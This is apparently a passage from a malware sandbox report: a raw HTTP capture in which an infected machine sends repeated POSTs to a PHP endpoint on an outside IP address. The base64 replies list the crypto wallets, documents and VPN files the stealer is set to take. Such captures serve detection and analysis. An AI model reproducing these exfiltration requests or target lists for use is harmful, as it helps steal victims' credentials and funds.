                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 2d 2d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: ------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="message"wallets------HIJEGDBGDBFIJKECBAKF--
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:06.644071102 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:06 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 2408
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11 [TRUNCATED]
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:06.651850939 CEST466OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJE
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 265
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 2d 2d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: ------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="message"files------EGIDBFBFHJDGCAKEGHJE--
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:06.938599110 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:06 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 2052
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBN [TRUNCATED]
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:06.993628979 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEB
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1759
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:07.304008961 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:07 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:07.316364050 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAA
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:07.622807026 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:07 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:09.115694046 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDB
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1759
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:09.421427011 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:09 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:09.518847942 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBA
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:09.820143938 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:09 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:10.071856976 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIII
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1759
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:10.374001980 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:10 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:10.510464907 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----GIIIECBGDHJJKFIDAKJD
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:10.813869953 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:10 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:10.834996939 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKF
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1759
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:11.137269974 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:11 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:11.197149038 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBF
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:11.502537966 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:11 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:11.582150936 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJE
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1759
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:11.882704020 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:11 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:11.910815954 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJE
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:12.222513914 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:12 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:13.590199947 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBA
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1759
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:13.894031048 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:13 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:14.365943909 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----CFIEGDAEHIEHIDHJDAAK
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:14.672225952 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:14 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:14.779171944 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----FBAKEHIEBKJJJJJKKKEG
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1759
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:15.104398012 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:15 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:15.111175060 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECF
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:15.417761087 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:15 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:15.450362921 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----CGIJECFIECBFIDGDAKFH
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1759
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:15.760030985 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:15 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:15.993558884 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EBGIDGCAFCBKECAAKJJK
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:16.299725056 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:16 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:16.518019915 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDA
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:16.832190990 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:16 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:17.050988913 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----GCBKFBFCGIEHIDGCFBFB
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:17.364259005 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:17 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:17.370505095 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKF
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:17.675612926 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:17 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:17.683614969 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----FIDHCFBAKFBGDGDHJKJJ
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:17.991317034 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:17 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:18.003930092 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
